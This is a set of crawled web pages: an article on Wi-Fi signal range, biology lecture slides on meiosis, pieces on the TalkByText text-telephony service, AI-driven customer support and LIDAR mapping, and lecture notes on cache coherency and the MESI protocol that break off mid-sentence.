s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280891.90/warc/CC-MAIN-20170116095120-00250-ip-10-171-10-70.ec2.internal.warc.gz
en
0.961645
865
2.859375
3
How Far can a Wi-Fi Signal Travel? You’ve most likely noticed that Wi-Fi signals do not travel an infinite distance. The farther a Wi-Fi signal goes, the weaker it gets. This is known as attenuation. The same thing happens to your voice. When you speak or yell, your voice will be nice and loud nearby, but your voice will get weaker (softer) the farther it travels. Exactly how far a Wi-Fi signal can travel depends on several factors: 1. The type of wireless router used: More powerful wireless routers (with more powerful antennas) are capable of transmitting a signal farther. 2. The type of 802.11 protocol used. Here are the transmission ranges (indoors): - 802.11b: 115 ft. - 802.11a: 115 ft. - 802.11g: 125 ft. - 802.11n: 230 ft. - 802.11ac: 230 ft. However, keep in mind that calculating attenuation and wireless ranges indoors can be very tricky. That’s because inside your house, the Wi-Fi signal bounces off obstacles and has to penetrate a variety of materials (like walls) that weaken the signal. What Kinds of Things Can Obstruct a Wireless Signal? Solid items can greatly attenuate (weaken) communication signals. Let’s compare this to your voice again. If you’re speaking to someone in another room, they’ll be able to hear you more clearly if the door between the two rooms is open rather than closed. Likewise, obstructions like walls and doors can dampen a wireless signal, decreasing its range. - A solid wood door will attenuate a wireless signal by 6 dB. - A concrete wall will attenuate a wireless signal by 18 dB. And each 3 dB of attenuation represents a power loss of ½! What Else Can Impact a Wireless Signal? In addition to physical obstructions like walls and doors, radio interference can also impact Wi-Fi signals. For example, various home appliances like microwave ovens, cordless phones, and wireless baby monitors can all interfere with your Wi-Fi network (you can read more about wireless interference here). In addition, if there are too many Wi-Fi networks all using the same wireless channel in the same area, the “noise” can impact your signal. Let’s return to the voice comparison. What happens when you’re trying to speak and someone else starts speaking, turns on the TV, or turns up the radio volume at the same time? It’s much harder for others to hear what you’re saying. How Can Wired/Wireless Extenders Help? If you have a big house, and you’d like to be able to communicate with someone upstairs or in a far room, you might install a home intercom system. This is similar to a wired Wi-Fi extender. These devices use the home’s existing wiring (coax for MoCA-based solutions and electrical wiring for Powerline-based solutions) to extend the wireless network into a far corner of the home. In essence, they carry the wireless signals through a wired connection (where there’s less attenuation and interference) and then send out a strong wireless signal in the new location.
<urn:uuid:d0fbb04c-7118-42ba-ac52-db2e74238df0>
CC-MAIN-2017-04
http://wifi.actiontec.com/learn-more/wifi-wireless-networking/how-far-can-a-wi-fi-signal-travel/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00158-ip-10-171-10-70.ec2.internal.warc.gz
en
0.896758
700
3.40625
3
What email address or phone number would you like to use to sign in to Docs.com? If you already have an account that you use with Office or other Microsoft services, enter it here. Or sign in with: Signing in allows you to download and like content, which the author will be aware of. Embed code for: Ess-ch9_meiosis (1) Select a size * * * * * * * * * * 9.1 What is Meiosis and why it is important to evolution and adaptation? Meiosis (sexual) serves 2 major functions Production of gametes/spores by reducing from 2n to n the chromosome number of the species Produce genetic variation by shuffling chromosomes in the cell to produce genetically different combinations Eukaryote’s chromosomes come often in pairs of homologous chromosomes (2n) Also called homologues Have the same size, shape, and construction (location of centromere) Contain the same genes for the same traits The offspring receives one member of each homologous pair from each parent Homologous pairs may contain different versions of the same gene Alleles – alternate forms of a gene Both males and females have 23 pairs of chromosomes 23 pairs or 46 total chromosomes = diploid (2n) Haploid number (n) in gametes – 23 total chromosomes 22 pairs of autosomes 1 pair of sex chromosomes XX female or XY male Figure 9.1 Homologous chromosomes homogenous autosome pair The 46 chromosomes of a male sister chromatids centromere Sex chromosomes are different lengths in males. Human life cycle Life cycle – in sexually reproducing organisms refers to all the reproductive events that occur from one generation to the next Involves both mitosis and meiosis Mitosis involved in continued growth of a child and repair of tissues throughout life Somatic (body) cells are diploid Meiosis reduces the chromosome number from diploid to haploid Gametes (egg and sperm) have only 1 member of each homologous pair Spermatogenesis produces sperm in the testes Oogenesis produces eggs in the ovaries Egg and sperm join to form diploid zygote Figure 9.2 Life cycle of humans FERTILIZATION Mitosis Mitosis 2n 2n MEIOSIS sperm n egg n 2n=46 diploid(2n) haploid (n) n=23 zygote2n 2n 9.2 The Phases of Meiosis Meiosis involves two divisions: meiosis I and meiosis II Each division is broken down into four phases: Prophase (I and II) Metaphase (I and II) Anaphase (I and II) Telophase (I and II) Results in 4 daughter cells 2 divisions Meiosis I Homologous pairs line up during synapsis resulting in tetrad Homologous chromosomes of each pair then separate Meiosis II No duplication of chromosomes Chromosomes are dyads – composed of 2 sister chromatids Sister chromatids are separated 2 daughter nuclei separate Figure 9.3 Overview of meiosis Chromosome duplication Meiosis II n=2 n=2 n=2 n=2 Meiosis II dyad Meiosis I Chromosome duplication 2n=4 sister chromatids centromere tetrad prophase I Figure 9.6 Meiosis I Meiosis I: Homologous chromosomes separate nuclear envelope fragment Prophase I Metaphase I Anaphase I Telophase I sister chromatids Prophase I Tetrads form, and crossing-over occurs as chromosomes condense; the nuclear envelope fragments. Metaphase I Tetrads align at the spindle equator. Either homologue can face either pole. Anaphase I Homologues separate, and dyads move to poles. Telophase I Daughter nuclei are haploid ,having received one duplicated chromosome from each homologous pair. n=2 centromere 2n=4 crossing-over spindle forming chromosome attached to a spindle fiber crossing over chromosomes still duplicated cleavage furrow tetrad Figure 9.4 Prophase I spindle poles tetrad During prophase I, replicated homologous chromosomes pair up and form a tetrad, a process called synapsis Each tetrad consists of 2 duplicated chromosomes (dyads), with each chromosome containing 2 sister chromatids, for a total of 4 chromatids Dyad Two sister chromatids Figure 9.5 Crossing-over chromosomes in four different gametes chromatids after exchange crossing-over between nonsister chromatids synapsis nonsister chromatids Crossing-over When a tetrad forms during synapsis, chromatids from homologous chromosomes (nonsister chromatids) may exchange genetic material Increases variability of the gametes and, therefore, the offspring The importance of meiosis Chromosome number stays constant in each new generation Generates diversity Crossing-over All possible combinations of haploid number of chromosomes Fertilization produces new combinations (2)n (2)3 chromosomally different zygotes without crossing-over (2)n=(2)3=8 Figure 9.7 Meiosis II Prophase II Chromosomes condense, and the nuclear envelope fragments. Metaphase II Tetrads align at the spindle equator. Anaphase II Sister chromatids separate ,becoming daughter chromosomes that move to the poles. n=2 Telophase II haploid daughter cells forming sister chromatids separate Telophase II Four haploid daughter cells are genetically different from each other and from the parent cell. Prophase II Metaphase II Anaphase II Meiosis II: Sister chromatids separate 9.3 Meiosis Compared with Mitosis Meiosis requires two nuclear divisions, but mitosis requires only one nuclear division Meiosis produces four daughter nuclei, and there are four daughter cells following cytokinesis; mitosis followed by cytokinesis results in two daughter cells Following meiosis, the four daughter cells are haploid and have half the chromosome number as the parent cell; following mitosis, the daughter cells have the same chromosome number as the parent cell Following meiosis, the daughter cells are genetically dissimilar to each other and to the parent cell; following mitosis, the daughter cells are genetically identical to each other and to the parent cell Figure 9.8 Meiosis compared with mitosis Meiosis Mitosis Daughter chromosomes have separated. Haploid daughter nuclei are not genetically identical to parent cell. Diploid daughter nuclei are genetically identical to parent cell. Daughter cells have formed. Daughter cells have formed. Homologues separate. Daughter chromosomes separate. Tetrads are at spindle equator. Dyads are at spindle equator. Synapsis and crossing-over occur. Meiosis occurs only at certain times of the life cycle of sexually reproducing organisms and only in specialized tissues Mitosis is much more common Occurs in all tissues during embryonic growth Also occurs during growth and repair 92 92 46 Chromosomes Chromatids Chromosomes Chromatids Number of Chromosomes and Number of Chromatids after DNA replication (duplication) 9.4 Abnormal Chromosome Inheritance Nondisjunction Meiosis I when both members of a pair go into the same daughter cell Meiosis II when sister chromatids fail to separate Trisomy – 3 copies of a chromosome Monosomy – single copy of a chromosome Figure 9.9a Nondisjunction during meiosis Meiosis II Meiosis I pair of homologous chromosomes non disjunction Gamete will have one less chromosome. Gamete will have one extra chromosome. Non disjunction during meiosis I (2n-1) (2n+1) Meiosis II Meiosis I normal meiosis I non disjunction pair of homologous chromosomes Gamete will have either one less or one extra chromosome. normal meiosis II Gamete will have normal number of chromosomes. Non disjunction during meiosis II Figure 9.10 Down syndrome Bella, 3 yo Photo: 2012 Santorum, 53 yo Garver, 52 yo Autosomal trisomy 18 (Edwards Syndrome Abnormal sex chromosome number Too few or too many X or Y chromosomes Newborns with abnormal sex chromosome numbers are more likely to survive than those with abnormal autosome numbers Extra X chromosomes become Barr bodies – inactivated Y determines maleness SRY (sex-determining region Y) gene on Y chromosome Turner syndrome (45, XO) Absence of second sex chromosome Female Klinefelter syndrome (47, XXY) Extra X inactivated as Barr body Male Figure 9.11 Abnormal sex chromosome number no facial hair some breast development very long arms less-developed testes very long legs a. A female with Turner (XO) syndrome b. A male with Klinefelter (XXY) syndrome webbed neck less-developed breasts less-developed ovaries * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * When a tetrad forms during synapsis, chromatids from homologous chromosomes (nonsister chromatids) may exchange genetic material Increases variability of the gametes and, therefore, the offspring The importance of meiosis Chromosome number stays constant in each new generation Generates diversity Crossing-over All possible combinations of haploid number of chromosomes Fertilization produces new combinations (2)n (
<urn:uuid:3c96ed67-8018-42b7-9207-edc73fc84141>
CC-MAIN-2017-04
https://docs.com/britzeida-rodriguez/9242/ess-ch9-meiosis-1
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00158-ip-10-171-10-70.ec2.internal.warc.gz
en
0.857849
1,971
3.484375
3
Enterprises and organisations of all shapes and sizes must be able to communicate effectively with their clients to survive. Technology, in particular the web, has greatly increased the number of options available for such communications. Very nearly as a by-product the web has improved the ability of organisations to communicate with people with disabilities. People with vision impairments can now read electronic documents that used to only be available in inaccessible printed format. People with mobility problems can now get all the information delivered to their desk rather than having to go to the organisation to be provided with the information. People with hearing impairments can now read information rather than having to discuss it with someone who was unable to communicate with them with sign language. However, the web is not the right solution for all levels of communication. There are times when communicating directly with another human being is what is really needed: - complex product selection where a series of questions and answers is the only way to get to the correct solution. - problem diagnosis and resolution. - assistance with the use of some product or process. The telephone connected to a call centre is the typical way of resolving this sort of issue. It is a convenient and accessible solution for most people including most people with disabilities. However, people with hearing impairments, or speech impediments, are excluded from this sort or help. E-mail and SMS can provide a partial solution but they cannot be considered equivalent to, or as effective as, a telephone connection. A videophone link with an operator who can sign might be considered the ideal solution. But in reality the lack of the requisite technology and operators who can sign means that this is only practical in very specialised circumstances. It also does not meet the needs of hard of hearing people who do not use sign language and find text the most accessible medium. The textphone, also known as Minicom, has been the standard solution in Europe and in America they use TTY. These technologies provide a character-by-character synchronous communication, which means that when a user types a character at one end it is immediately visible at the other. This gives a much more natural flow of communication without the inevitable delays inherent in technologies such as SMS and instant messaging. It even allows the recipient to interrupt by typing at the same time as they are still receiving a message. Thus providing a text equivalent of a telephone conversation. The textphone solution has been around for a long time and has been showing its age. It uses specialised technology at both ends, runs over a very slow telecommunication channels, is not mobile and is clunky to use in comparison to PCs and mobile phones. The Royal National Institute for Deaf and Hard of Hearing People (RNID) in the UK has created an updated version of the solution called TalkByText, that replaces the specialised hardware with programs that run on PCs, the Web, or mobile phones. TalkByText uses Text over IP (ToIP) to enable the text to flow over the same IP network as data, voice and video. It comes in four different editions. The Business Edition allows any PC user in an enterprise to contact any textphone or TalkByText user, either internally in the organisation or externally. It uses the latest IP networks for communications, and is controlled by a central server in the organisation. The server converts from IP to the older textphone networks when necessary. The Web Edition provides a browser interface. This can be useful for a deaf person when they are travelling as they can use it from any Internet cafe or similar environment. It is also useful for the occasional user, such as myself, who needs to be able to contact a deaf relative, friend or business acquaintance. It can also be used by people living abroad as they can register with RNID and then use the web to communicate with users in the UK. The only limitation is that the user can only initiate calls but cannot receive incoming calls. The Mobile Edition runs on mobile phones such as the Nokia 9500. This complements the already heavy use of SMS by many deaf people; and enables them to have a bi-directional synchronised mobile conversation when appropriate. The latest addition to the TalkByText family is the Home Edition. This is a small PC application that provides greater functionality than the Web Edition; in particular an integrated address book and the ability to receive calls. This solution can be used to replace the textphone hardware. As it uses the Internet, calls to other Home, or Business, Edition users are free. I believe the TalkByText should be installed in every significant organisation. It is not complex or expensive and will enable anyone inside the organisation to carry on a normal business conversation with anyone who can benefit from using a textphone solution. I also think that organisations should consider including a portal to their TalkBy Text Business Edition in the website. This would enable the user to contact the organisation immediately if they required some assistance related to their current web visit. Any organisation providing such an integrated approach would show great respect for their deaf and speech impaired users; this should reflect their corporate social responsibility to reach out to their full potential user community. Whenever I look at technology specially developed for people with disabilities I asked the question "has this got a wider application?"; in this case I feel sure that some instant message users would appreciate the greater immediacy of TalkByText. So I think that providers of instant messaging technology should integrate the basic technology into their offerings. The Voice Over IP providers might also interested in integrating this into their solution; it could bring in a new cohort of users and provide some additional functionality to the existing users. This service might just support connection between two Voice Over IP users but ideally it would include break-out server to enable VoIP to older technologies. The other extension of the technology is outside the UK; I understand that the RNID is actively working with their sister organisations around the world to help them develop similar solutions in their countries.
<urn:uuid:c15b6a33-61b1-4647-b6e6-343a5becfb2c>
CC-MAIN-2017-04
http://www.bloorresearch.com/analysis/talkbytext-a-telephone-call-for-people-with-hearing-or-spee/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280929.91/warc/CC-MAIN-20170116095120-00517-ip-10-171-10-70.ec2.internal.warc.gz
en
0.955693
1,209
2.984375
3
We are getting smarter as a species by how much and how fast we consume content. Historically we have seen a continuous evolution of how we learn, how much we know, and how many of us know it. There is a natural hierarchy, from beginners who are still learning to read, to researchers and searchers of the web. – This hierarchy is directly impacting the level of world literacy because of the advancements in mode of information transportation and amount of content consumed. We can track this evidence historically through the types of technology offered. How technology changed the way we consumed information For example, 2500 years ago the Greeks became the second literate culture. By the 1400s our friend Johannes Gutenberg invented the printing press and the world change the way it acquired knowledge forever. At that time about 30 percent of European Adults were literate. It became the first technology disrupter to make it easy for groups of people to exchange ideas, indepently and collectively. Before, it was limited to a small percent of people who used scrolls, art, and song to gain knowledge. The printing press dramatically propelled the masses from being doers to thinkers. By 1680ac, 33 million people could read and by the 1800s the momentum brought us to 55 million. No longer was the wealth of information meant for the privileged class but for all. We were getting smarter! After the printing press our advancements grew dramatically. At the signing of the U.S. Constitution in 1787, nearly 60 percent of 3 million American adults could read but in the following 19th and 20th centuries, literacy rates in America grew rapidly. By 1870, almost 80 percent of 38.5 million Americans were literate and by 1940, almost 95 percent of 131 million citizens could read. Today, Technology continues to develop our ability to learn and exchange information. We are faster at it than ever before, and latest studies show the evidence. In 2008, UNESCO reported that 98 percent of American adults could read. Nearly 294 million Americans of about 300 million are literate and most children can read by the time they’re six or seven. According to the Census Bureau, 25-34 year-olds are now the best educated group of Americans: nearly 58 percent have some college education, and almost 27 percent have a bachelor’s degree or more. Globally we are clearly getting smarter and you can see the evidence in all regions of the world over the last century. See Figures 1 and 2. So why should this matter, why should I care? Since the invention of the internet we have seen the world’s ability to know more skyrocket. We are learning and sharing ideas faster than ever. In 2000 there were more than 300 million people using the internet by 2010 that number soared to an astonishing 1.9 billion people. How the internet is affecting the demand to know more now We are intellectually growing as a species faster than any other time in human history and it’s because of the internet. In nearly 20 years we went from less than 1% connected to the web, to 40% of the world’s population searching Google and other search engines. The number of internet users increased tenfold from 1999 to 2013. The first billion was reached in 2005. The second billion in 2010 and the third billion will be reached in 2014. That’s 3 billion people all connected, all sharing ideas. And to give you a some context to how staggering this number is there is about 7 billion people on earth. What we have accomplished in 20 years is amazing. But it’s not just the mode of transportation that’s creating this instant need. There are other factors that are reducing amount of content needed while decreasing the expectation of how much information we should read. Social networking sites like Facebook, Twitter, Youtube, and more are changing our habits and creating a new demand for faster understandings. How social networks created the “Now” factor Along with social networks, going mobile catapulted the next wave of how we consume information. It turned people’s “faster” need, into the “now” need. When we reduced screen size we lost the ability to offer hundreds of lines of text to read. At first we reinvented the structure of paragraphs and made our U.I’s more image centric but the demand for instant answers was not being answered. How much content do people read on a page? On the average Web page, users read at most 28% of the words during a website visit, yet we expect them to know 100%. People rarely read Web pages word by word; instead, they scan the page, picking out individual words and sentences. As a result, web pages have to employ scannable text, using highlighted keywords, meaningful sub-headings, and bulleted lists of one idea per paragraph. What we have found is most users will skip over any additional ideas if they are not caught by the first few words in the paragraph. With less content being read, more people want instant answers. For those with heavy pages of content, products, and services- usability is more difficult. We see this evidence from the growing trend of people using search bars or asking customer support centers for what they want, expecting an instant exact answer. Why the common CRM is no longer effective To act as a solution people have reinvented the customer support model to fit online. There are hundreds of companies who focus on using people to deliver answers to their community with online tools. But the reality is there is far more information then there are people, and that is why these companies who use CRM platforms have such high ticket traffic. We are asking both agents and the customers to use the same search technology to find answers in the content. Each day a new customer and the same agents answer the same questions, over and over again. Each time a company creates new content, products, or services more redundant unanswered questions come, and the more demand is pressured on customer support. So what is the solution? As we said in the beginning, those who stay ahead of the information exchange and use innovating technology to make it easier for people to get answers will win. This is why technology like Artificial Intelligence is picking up steam because it’s answering this fundamental pain – Why should people be forced to read large amounts of content if all they have to do is ask a question? All of those sci-fi movies where people talk to computers is happening. We all want to read less, but know more. This is where new companies are breaking ground in A.I., semantic search, and interactive information exchange. Companies like Inbenta are focused on using A.I. technology like our advanced Semantic Search engine to answer people’s questions before the contact support. This technology focuses on how people use Natural Language, or the way we commonly talk and ask questions to each other. For Inbenta, we want to create a similar exchange with machines the same way we do with each other. With this type of technology companies who run e-Commerce websites will change the way customer support is done. This new Customer support model helps companies embrace an “Answers First, Customer Support Second”, system. There is less work done by the customer support team and more work done by a machine that is interacting with people naturally and real. Offering technology that can find the right answers before humans do will change the rate of information exchange from 24 hours to instantly. Connecting tools like Avatars and Virtual Assistants to a Semantic Search engine and Self Service tools will provide and intelligent intuitive and and interactive experience that can be personal and immediate in responses. We have come along way in how we digest content and create new ideas. We will continue to advance how we interact with people and how this interaction effects the way we make choices. For people, they will experience more with less work in the content they have to read. For companies that conduct businesses it means less time explaining in paragraphs and more focus on building interactive relationships that grow their businesses, their communities and provide instant results.
<urn:uuid:e3b3916d-aa0e-40b5-9cc8-b3efb68c6668>
CC-MAIN-2017-04
https://www.inbenta.com/en/blog/the-evolution-of-content-delivery-is-changing-the-way-people-and-customer-support-work-together/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282935.68/warc/CC-MAIN-20170116095122-00333-ip-10-171-10-70.ec2.internal.warc.gz
en
0.953543
1,661
2.984375
3
How LIDAR is revolutionizing maps, geospatial data First of four parts. It's faster than a speeding bullet. It can measure buildings in a single pulse. It can scan the ocean floor and peer through forest canopies to measure undergrowth. It's LIDAR – light detection and ranging. A standard LIDAR system emits a beam of light from a laser source and then captures the returned light in sensors as it bounces back from a reflecting object, measuring the distance by calculating the time required for the round trip. While LIDAR systems were used by the federal government as early as the 1960s — primarily for atmospheric studies — it wasn't until after 2000 that a combination of factors resulted in a boom of LIDAR data-gathering projects that are now bearing fruit at federal, state and local government levels. U.S. troops have used LIDAR to map the difficult terrain in Afghanistan and a Colorado State University scientist used it in creating the first forest height map to measure carbon cycles in ecosystems. "It's being used by just about everybody who uses a map," said John English, LIDAR data coordinator for Oregon's Department of Geology. "Every municipality and county is using it. The Department of Land Management and the U.S. Forest Service use it for their forest inventory surveys." According to English, the agencies are increasingly turning to LIDAR because the technology has gotten both less expensive and more accurate, and, because surveys are generally done from aircraft, vast amounts of territory can be covered quickly. "It's been a huge timesaver," he said. "The estimate of savings is incalculable." Kirk Waters, a program manager at the National Oceanic and Atmospheric Administration's Coastal Services Center, agrees. "LIDAR is a way to get fairly accurate elevations over a broad area at a reasonable price," he said. Waters pointed to a March 2012 report by the U.S. Geological Survey that found that a national program of collecting LIDAR data would result in net benefits of between $116 million and $620 million a year. According to the study — the National Enhanced Elevation Assessment — the biggest savings are to be realized in flood risk management, infrastructure and construction management, natural resources conservation, agriculture and water supply management. Elevation data can tell city planners where to plan mitigation for floods. It can tell farmers where to expect irrigation runoff and where to plant crops that require the most expensive fertilizers. Cities are using LIDAR to build 3D maps. In all, "the study came up with 600 different uses,” Waters said. “There's just tons of applications." "It's at the beginning stages," said Steve Snow, a mapping and LIDAR specialist with geospatial tech company Esri. "Everybody is learning about the technology." Esri, in fact, just added the ability to import native LIDAR directly into its industry-standard ArcGIS software. In principle, the technology behind LIDAR is simple. By measuring the time it takes light to bounce off an object, and knowing the speed of light (186,000 miles per second), one can detect the distance of the object. The challenge has been in developing equipment that can fire rapid pulses of light — in some cases up to 150,000 pulses per second — and that can measure the returning light with accuracy. LIDAR systems vary in the wavelengths of light and the power of the pulses employed. High-energy pulse systems, for example, typically are used for atmospheric research, while lower-powered micropulse systems are more often employed for downward scanning, since they are considered "eye safe." And although most airborne LIDAR systems use 1064-nanometer laser beams, bathymetric LIDAR systems — those used to penetrate water — employ a narrower 532-nm beam. Bathymetric LIDAR also transmits two light waves, one infrared and the other green. As a result, it can detect two returning signals, one off the water surface and the other from the seabed. Other critical elements in the development of LIDAR systems have been the enhancements in the production of higher-resolution and more flexible scanners, optics and photoreceptors. Finally, collecting LIDAR data from aircraft involves a few additional challenges. Because the LIDAR sensor is moving, the changes in location between the firing of the pulse of light and its return must be accounted for in making any measurement. That required the development of fast, high-resolution GPS devices and inertial measurement units that measure velocity and orientation. Coordinating of this, of course, is no mean feat, nor is digesting the massive amounts of data that are produced. According to Waters, NOAA's LIDAR scans are shooting between 100,000 and 200,000 points per second with about up to 10cm of error. "The rest is math," Waters said. "Lots of math, but it's still just math." NEXT: LIDAR proves its worth in the floodplains of the Red River Basin and the Forests of Oregon
<urn:uuid:e5d49b65-7c06-457d-962e-94435b9d6420>
CC-MAIN-2017-04
https://gcn.com/Articles/2013/03/12/LIDAR-revolutionizing-maps-geospatial-data.aspx?s=BIGDATA_100413&admgarea=TC_BigData&Page=2
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279189.36/warc/CC-MAIN-20170116095119-00151-ip-10-171-10-70.ec2.internal.warc.gz
en
0.951062
1,066
3.421875
3
A multiprocessor and a multicomputer each comprise a number of independent processors connected by a communications medium, either a bus or more advanced switching system, such as a crossbar switch. We focus this discussion on multiprocessors, which use a common main memory as the primary means for inter–processor communication. Later, we shall see that many of the same issues appear for multicomputers, which are more loosely coupled. Logically speaking, it would be better to do without cache memory. Such a solution would completely avoid the problems of cache coherency and stale data. Unfortunately, such a solution would place a severe burden on the communications medium, thereby limiting the number of independent processors in the system. This lecture will focus on a common bus as a communications medium, but only because a bus is easier to draw. The same issues apply to other switching systems. Topics for today: 1. The cache write problem for uniprocessors and multiprocessors. 2. A simple cache coherency protocol. 3. The industry standard MESI protocol. The Cache Write Problem Almost all problems with cache memory arise from the fact that the processors write data to the caches. This is a necessary requirement for a stored program computer. The problem in uniprocessors is quite simple. If the cache is updated, the main memory must be updated at some point so that the changes can be made permanent if needed. Here is a simple depiction of a uniprocessor with a cache. As always, this could be (and often is) elaborated significantly in order to achieve better performance. It was in this context that we first met the issue of cache write strategies. We focused on two strategies: write–through and write–back. In the write–through strategy, all changes to the cache memory were immediately copied to the main memory. In this simpler strategy, memory writes could be slow. In the write–back strategy, changes to the cache were not propagated back to the main memory until necessary in order to save the data. This is more complex, but faster. The Cache Write Problem (Part 2) The uniprocessor issue continues to apply, but here we face a bigger problem. The coherency problem arises from the fact that the same block of the shared main memory may be resident in two or more of the independent caches. There is no problem with reading shared data. As soon as one processor writes to a cache block that is found in another processor’s cache, the possibility of a problem arises. Cache Coherency: Introductory Comments We first note that this problem is not unique to parallel processing systems. Those students who have experience with database design will note the strong resemblance to the “lost update” problem. Those with experience in operating system design might find a hint of the theoretical problem called “readers and writers”. It is all the same problem: handling the problem of inconsistent and stale data. The cache coherency problems and strategies for solution are well illustrated on a two processor system. We shall consider two processors P1 and P2, each with a cache. Access to a cache by a processor involves one of two processes: read and write. Each process can have two results: a cache hit or a cache miss. Recall that a cache hit occurs when the processor accesses its private cache and finds the addressed item already in the cache. Otherwise, the access is a cache miss. Read hits occur when the individual processor attempts to read a data item from its private cache and finds it there. There is no problem with this access, no matter how many other private caches contain the data. The problem of processor receiving stale data on a read hit, due to updates by other independent processors, is handled by the cache write protocols. Cache Coherency: The Wandering Process Problem This strange little problem was much discussed in the 1980’s (Ref. 3), and remains somewhat of an issue today. Its lesser importance now is probably due to revisions in operating systems to better assign processes to individual processors in the system. The problem arises in a time–sharing environment and is really quite simple. Suppose a dual–processor system: CPU_1 with cache C_1 and CPU_2 with cache C_2. Suppose a process P that uses data to which it has exclusive access. Consider the following scenario: 1. The process P runs on CPU_1 and accesses its data through the cache C_1. 2. The process P exceeds its time quantum and All dirty cache lines are written back to the shared main memory. 3. After some time, the process P is assigned to CPU_2. It accesses its data through cache C_2, updating some of the data. 4. Again, the process P times out. Dirty cache lines are written back to the memory. 5. Process P is assigned to CPU_1 and attempts to access its data. The cache C_1 retains some data from the previous execution, though those data are stale. In order to avoid the problem of cache hits on stale data, the operating system must flush every cache line associated with a process that exceeds its time quota. Cache Coherency: Snoop Tags Each line in a cache is identified by a cache tag (block number), which allows the determination of the primary memory address associated with each element in the cache. Cache blocks are identified and referenced by their memory tags. In order to maintain coherency, each individual cache must monitor the traffic in cache tags, which corresponds to the blocks being read from and written to the shared primary memory. This is done by a snooping cache (or snoopy cache, after the Peanuts comic strip), which is just another port into the cache memory from the shared bus. The function of the snooping cache is to “snoop the bus”, watching for references to memory blocks that have copies in the associated data cache. Cache Coherency: A Simple Protocol We begin our consideration of a simple cache coherency protocol. After a few comments on this, we then move to consideration of the MESI protocol. In this simple protocol, each block in the cache of an individual processor can be in one of three states: 1. Invalid: the cache block does not contain valid data. 2. Shared (Read Only): the cache block contains valid data, loaded as a result of a read request. The processor has not written to it; it is “clean” in that it is not “dirty” (been changed). This cache block may be shared with other processors; it may be present in a number of individual processor caches. 3. Modified (Read/Write): the cache block contains valid data, loaded as a result of either a read or write request. The cache block is “dirty” because its individual processor has written to it. It may not be shared with other individual processors, as those other caches will contain stale data. Terminology: The word “invalid” has two uses here: 1) that a given cache block has no valid data in it; and 2) the state of a cache just prior to a cache miss. A First Look at the Simple Protocol Let’s consider transactions on the cache when the state is best labeled as “Invalid”. The requested block is not in the individual cache, so the only possible transitions correspond to misses, either read misses or write misses. Note that this process cannot proceed if another processor’s cache has the block labeled as “Modified”. We shall discuss the details of this case later. In a read miss, the individual processor acquires the bus and requests the block. When the block is read into the cache, it is labeled as “not dirty” and the read proceeds. In a write miss, the individual processor acquires the bus, requests the block, and then writes data to its copy in the cache. This sets the dirty bit on the cache block. Note that the processing of a write miss exactly follows the sequence that would be followed for a read miss followed by a write hit, referencing the block just read. Cache Misses: Interaction with Other Processors We have just established that, on either a read miss or a write miss, the individual processor must acquire the shared communication channel and request the block. If the requested block is not held by the cache of any other individual processor, the transition takes place as described above. We shall later add a special state to account for this possibility; that is the contribution of the MESI protocol. If the requested block is held by another cache and that copy is labeled as “Modified”, then a sequence of actions must take place: 1) the modified copy is written back to the shared primary memory, 2) the requesting processor fetches the block just written back to the shared memory, and 3) both copies are labeled as “Shared”. If the requested block is held by another cache and that copy is labeled as “Shared”, then the processing depends on the action. Processing a read miss only requires that the requesting processor fetch the block, mark it as “Shared”, and execute the read. On a write miss, the requesting processor first fetches the requested block with the protocol responding properly to the read miss. At the point, there should be no copy of the block marked “Modified”. The requesting processor marks the copy in its cache as “Modified” and sends an invalidate signal to mark all copies in other caches as stale. The protocol must insure that no more than one copy of a block is marked as “Modified”. Write Hits and Misses As we have noted above, the best way to view a write miss is to consider it as a sequence of events: first, a read miss that is properly handled, and then a write hit. This is due to the fact that the only way to handle a cache write properly is to be sure that the affected block has been read into memory. As a result of this two–step procedure for a write miss, we may propose a uniform approach that is based on proper handling of write hits. At the beginning of the process, it is the case that no copy of the referenced block in the cache of any other individual processor is marked as “Modified”. If the block in the cache of the requesting processor is marked as “Shared”, a write hit to it will cause the requesting processor to send out a “Cache Invalidate” signal to all other processors. Each of these other processors snoops the bus and responds to the Invalidate signal if it references a block held by that processor. The requesting processor then marks its cache copy as “Modified”. If the block in the cache of the requesting processor is already marked as “Modified”, nothing special happens. The write takes place and the cache copy is updated. The MESI Protocol This is a commonly used cache coherency protocol. Its name is derived from the fours states in its FSM representation: Modified, Exclusive, Shared, and Invalid. This description is taken from Section 8.3 of Tanenbaum (Reference 4). Each line in an individual processors cache can exist in one of the four following states: 1. Invalid The cache line does not contain valid data. 2. Shared Multiple caches may hold the line; the shared memory is up to date. 3. Exclusive No other cache holds a copy of this line; the shared memory is up to date. 4. Modified The line in this cache is valid; no copies of the line exist in other caches; the shared memory is not up to date. The main purpose of the Exclusive state is to prevent the unnecessary broadcast of a Cache Invalidate signal on a write hit. This reduces traffic on a shared bus. Recall that a necessary precondition for a successful write hit on a line in the cache of a processor is that no other processor has that line with a label of Exclusive or Modified. a result of a successful write hit on a cache line, that cache line is always marked as Modified. The MESI Protocol (Part 2) Suppose a requesting processor processing a write hit on its cache. By definition, any copy of the line in the caches of other processors must be in the 1. Modified The protocol does not specify an action for the processor. 2. Shared The processor writes the data, marks the cache line as Modified, and broadcasts a Cache Invalidate signal to other processors. 3. Exclusive The processor writes the data and marks the cache line as Modified. If a line in the cache of an individual processor is marked as “Modified” and another processor attempts to access the data copied into that cache line, the individual processor must signal “Dirty” and write the data back to the shared primary memory. Consider the following scenario, in which processor P1 has a write miss on a cache line. 1. P1 fetches the block of memory into its cache line, writes to it, and marks it Dirty. 2. Another processor attempts to fetch the same block from the shared main memory. 3. P1’s snoop cache detects the memory request. P1 broadcasts a message “Dirty” the shared bus, causing the other processor to abandon its memory fetch. 4. P1 writes the block back to the share memory and the other processor can access it. Events in the MESI Protocol This discussion is taken from Chapter 11 of the book Modern Processor Design (Ref. 5). There are six events that are basic to the MESI protocol, three due to the local processor and three due to bus signals from remote processors. Local Read The individual processor reads from its cache memory. Local Write The individual processor writes data to its cache memory. Local Eviction The individual processor must write back a 